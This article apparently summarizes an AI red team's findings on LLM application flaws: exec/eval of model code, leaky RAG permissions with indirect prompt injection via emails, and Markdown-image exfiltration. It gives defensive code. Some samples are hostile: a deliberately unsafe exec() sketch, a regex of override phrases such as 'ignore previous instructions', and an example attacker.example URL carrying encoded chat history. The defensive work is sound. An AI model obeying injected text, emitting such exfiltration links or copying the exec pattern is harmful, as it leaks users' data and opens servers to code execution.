NVIDIA's specialized AI Red Team has identified three critical security vulnerabilities commonly found in applications using Large Language Models (LLMs). The team's findings highlight significant risks, including remote code execution, data leakage through retrieval-augmented generation (RAG) systems, and data theft via active content rendering.
By sharing these recurring issues, NVIDIA aims to provide developers with practical advice to secure AI-powered systems before they are deployed, addressing the most impactful threats observed across numerous internal assessments.
Key Takeaways
- Remote Code Execution: Executing LLM-generated code without proper sandboxing is a primary vulnerability, often exploited through prompt injection to run malicious commands.
- Insecure RAG Systems: Poorly configured permissions in Retrieval-Augmented Generation (RAG) data sources can lead to unauthorized access to sensitive information and create pathways for indirect prompt injection attacks.
- Active Content Exploits: Rendering LLM outputs that contain active content like Markdown can be used by attackers to exfiltrate user data, such as conversation history, to external servers.
Vulnerability 1: Executing AI-Generated Code
One of the most severe security risks identified by the NVIDIA AI Red Team involves the direct execution of code produced by an LLM. Developers sometimes use functions like `exec` or `eval` to allow an AI model to perform tasks such as generating data plots or building SQL queries.
However, this practice creates a direct path for attackers. Using a technique called prompt injection, a malicious actor can trick the LLM into generating harmful code. If this code is then executed by the application without strict isolation, it can lead to remote code execution (RCE).
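To make the risk concrete, here is a minimal sketch of the pattern the team warns against. The `ask_llm` helper, the prompt wording, and the plotting scenario are hypothetical placeholders, not code from NVIDIA's report.

```python
# DANGEROUS PATTERN -- shown only to illustrate the vulnerability.

def ask_llm(prompt: str) -> str:
    """Hypothetical placeholder for a real LLM client call."""
    raise NotImplementedError("wire this to your LLM client")

def plot_user_request(user_input: str) -> None:
    # Ask the model to write plotting code for the user's request.
    generated_code = ask_llm(
        f"Write Python code that plots the following data:\n{user_input}"
    )
    # Executing raw model output: a prompt-injected request can make the model
    # emit os.system(...) or similar, which then runs with the application's
    # privileges -- this exec() call is the remote code execution path.
    exec(generated_code)
```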
What is Remote Code Execution?
Remote Code Execution (RCE) allows an attacker to run arbitrary commands on a target machine over a network. In the context of LLMs, a successful RCE attack could give the intruder full control over the application's server and its data.
Attackers can be sophisticated, wrapping their malicious commands in layers of obfuscation to bypass simple security filters or guardrails. The final payload can be hidden within instructions that seem benign.
Mitigation Strategies
The most effective way to prevent this type of attack is to avoid using functions like `exec` and `eval` on LLM-generated content altogether. Instead, NVIDIA recommends a safer approach:
- Design the application to interpret the LLM's intent rather than executing its raw output.
- Map the interpreted intent to a predefined and limited set of safe, explicitly permitted functions (a minimal sketch of this pattern follows the list).
- If dynamic code execution is absolutely necessary, it must be performed within a secure and isolated sandbox environment, such as one based on WebAssembly, to contain any potential damage.
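The sketch below illustrates the intent-mapping approach under some assumptions: the LLM is prompted to return a structured JSON action rather than raw code, and the action names, argument shapes, and helper functions shown here are illustrative, not an NVIDIA-provided API.

```python
import json

# Hypothetical allowlist: the only operations the application will ever perform.
def plot_sales(region: str) -> str:
    return f"Plotted sales for {region}"

def summarize_table(table: str) -> str:
    return f"Summarized table {table}"

ALLOWED_ACTIONS = {
    "plot_sales": plot_sales,
    "summarize_table": summarize_table,
}

def handle_request(llm_output: str) -> str:
    """Interpret the model's intent instead of executing its raw output.

    llm_output is expected to be JSON such as:
    {"action": "plot_sales", "args": {"region": "EMEA"}}
    Anything outside the allowlist is rejected.
    """
    try:
        intent = json.loads(llm_output)
        action = ALLOWED_ACTIONS[intent["action"]]
        return action(**intent["args"])
    except (json.JSONDecodeError, KeyError, TypeError) as exc:
        return f"Rejected request: {exc}"
```

Because the model's text is only parsed and matched against the allowlist, a prompt-injected response can at worst invoke an already-permitted action with attacker-chosen arguments, a far smaller attack surface than `exec` on arbitrary generated code.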
Vulnerability 2: Insecure Data Access in RAG Systems
Retrieval-Augmented Generation (RAG) is a popular architecture that allows LLMs to access external, up-to-date information without needing to be retrained. While powerful, RAG systems introduce their own set of security challenges, primarily related to data access controls.
How RAG Works
A RAG system first retrieves relevant documents or data from a knowledge base (like a company's internal wiki or document repository) based on a user's query. It then provides this information to the LLM as context to generate a more accurate and informed response.
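The retrieve-then-generate flow can be summarized in a few lines. In this sketch, the `knowledge_base.search` and `llm.complete` calls are hypothetical placeholders standing in for whatever vector store and model client a given application uses.

```python
def answer_with_rag(user_query: str, knowledge_base, llm) -> str:
    """Minimal RAG loop: retrieve relevant documents, then ground the answer."""
    # 1. Retrieve: find the documents most relevant to the query,
    #    typically via embedding similarity search in a vector store.
    documents = knowledge_base.search(user_query, top_k=5)

    # 2. Augment: place the retrieved text into the model's context window.
    context = "\n\n".join(doc.text for doc in documents)
    prompt = (
        "Answer the question using only the context below.\n\n"
        f"Context:\n{context}\n\nQuestion: {user_query}"
    )

    # 3. Generate: the LLM produces an answer grounded in the retrieved context.
    return llm.complete(prompt)
```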
The NVIDIA team found two major weaknesses in how RAG systems are often implemented.
Incorrect User Permissions
The first issue is the failure to correctly enforce user-specific permissions on the data retrieved. This can result in users accessing sensitive information they are not authorized to see. Common causes include:
- Original data sources (like Google Workspace or Confluence) having misconfigured permissions.
- The RAG data store failing to replicate the source's permission structure.
- Delays in updating permissions, leaving data exposed temporarily.
This vulnerability can lead to significant data leakage, where a low-privilege user could trick the AI into revealing confidential corporate or personal data.
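One way to reduce this risk is to enforce the caller's permissions at retrieval time rather than trusting the index alone. The sketch below assumes each stored document carries an access-control list replicated from the source system; the `allowed_groups` field and the `store.search` interface are illustrative assumptions.

```python
from dataclasses import dataclass, field

@dataclass
class Document:
    text: str
    # ACL replicated from the source system (e.g. Confluence space permissions).
    allowed_groups: set[str] = field(default_factory=set)

def retrieve_for_user(store, query: str, user_groups: set[str], top_k: int = 5):
    """Retrieve candidates, then drop anything the caller may not read.

    Filtering after retrieval (or, better, pushing the ACL filter into the
    vector store query itself) keeps unauthorized documents out of the
    LLM's context entirely.
    """
    candidates = store.search(query, top_k=top_k * 4)  # over-fetch, then filter
    authorized = [d for d in candidates if d.allowed_groups & user_groups]
    return authorized[:top_k]
```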
Broad Write Access and Indirect Injection
The second major RAG-related vulnerability is allowing broad write access to the data store that feeds the LLM. For instance, if a system indexes user emails to provide daily summaries, an attacker can exploit this.
An attacker could send a carefully crafted email containing a malicious prompt. When the RAG system indexes this email, the malicious prompt becomes part of the knowledge base. Later, when another user asks a related question, the system might retrieve the attacker's prompt, potentially leading to data exfiltration or other harmful actions. This is known as indirect prompt injection.
Mitigating this is complex because it often involves limiting the application's core functionality. NVIDIA suggests several layered defenses, such as allowing users to select trusted data sources, applying guardrails to check retrieved documents for malicious content, and establishing tightly controlled, authoritative datasets for sensitive topics.
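As one layer of that defense, retrieved documents can be screened before they ever reach the model's context. The sketch below uses a simple pattern check as a stand-in for a real guardrail model or service; the patterns shown are illustrative assumptions and are easy to evade on their own.

```python
import re

# Crude stand-in for a real guardrail: phrases that suggest an embedded
# instruction aimed at the model rather than content meant for a reader.
SUSPICIOUS_PATTERNS = [
    re.compile(r"ignore (all )?(previous|prior) instructions", re.IGNORECASE),
    re.compile(r"you are now", re.IGNORECASE),
    re.compile(r"send .* to https?://", re.IGNORECASE),
]

def filter_retrieved(documents: list[str]) -> list[str]:
    """Drop retrieved passages that look like indirect prompt injection.

    A production system would use a dedicated guardrail model or service here;
    a keyword filter is only a first layer, not a complete defense.
    """
    clean = []
    for text in documents:
        if any(p.search(text) for p in SUSPICIOUS_PATTERNS):
            continue  # ideally quarantine and log rather than silently discard
        clean.append(text)
    return clean
```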
Vulnerability 3: Data Theft Through Active Content
A third common vulnerability involves the application's user interface rendering active content, such as Markdown, generated by the LLM. Attackers can exploit this feature to steal sensitive data from users.
The attack works by using prompt injection to make the LLM include a specially crafted image link or hyperlink in its response. The URL in this link points to a server controlled by the attacker.
Crucially, the URL can also contain encoded data, such as the user's entire conversation history with the AI. When the user's browser automatically tries to load the image from the malicious URL, it sends the encoded data directly to the attacker's server logs.
How to Prevent Active Content Exploits
To counter this threat, NVIDIA's team recommends several defensive measures:
- Use Content Security Policies (CSPs): Implement a strict CSP that only allows images and other resources to be loaded from a pre-approved list of trusted domains.
- Make Links Transparent: For hyperlinks, always display the full destination URL to the user before they click. Alternatively, disable active links and require users to copy and paste them into their browser.
- Sanitize LLM Output: Before displaying the LLM's response to the user, strip all potentially active content such as Markdown, HTML, and URLs (a sketch of this approach follows the list).
- Disable Active Content: If other measures are not feasible, the most secure option is to completely disable the rendering of any active content in the user interface.
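Below is a minimal sketch of output sanitization. The regular expressions are illustrative and deliberately simple, not an exhaustive sanitizer; the attacker URL in the docstring is a hypothetical example of a prompt-injected payload.

```python
import re

# Illustrative patterns -- not an exhaustive sanitizer.
MARKDOWN_IMAGE = re.compile(r"!\[[^\]]*\]\([^)]*\)")   # ![alt](url)
MARKDOWN_LINK = re.compile(r"\[([^\]]*)\]\([^)]*\)")   # [text](url)
BARE_URL = re.compile(r"https?://\S+")

def sanitize_llm_output(text: str) -> str:
    """Strip active content from a model response before rendering it.

    Images are removed outright, links are reduced to their visible text,
    and remaining URLs are dropped, so a prompt-injected response like
    "![](https://attacker.example/log?data=<encoded chat history>)" cannot
    trigger an outbound request from the user's browser.
    """
    text = MARKDOWN_IMAGE.sub("", text)    # remove images before links
    text = MARKDOWN_LINK.sub(r"\1", text)  # keep only the visible link text
    text = BARE_URL.sub("[link removed]", text)
    return text
```

Output sanitization pairs naturally with the CSP recommendation above: even if a crafted image slips through, a policy such as `Content-Security-Policy: img-src 'self' https://trusted.example` keeps the browser from fetching it from an attacker-controlled host.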
Conclusion: A Proactive Approach to AI Security
The findings from the NVIDIA AI Red Team underscore the importance of building security into LLM applications from the ground up. By anticipating and mitigating these three common vulnerabilities—uncontrolled code execution, insecure RAG data access, and active content rendering—developers can significantly reduce the risk of exploitation.
Adopting these practical security measures is essential for protecting user data and ensuring the safe and reliable deployment of AI-powered systems.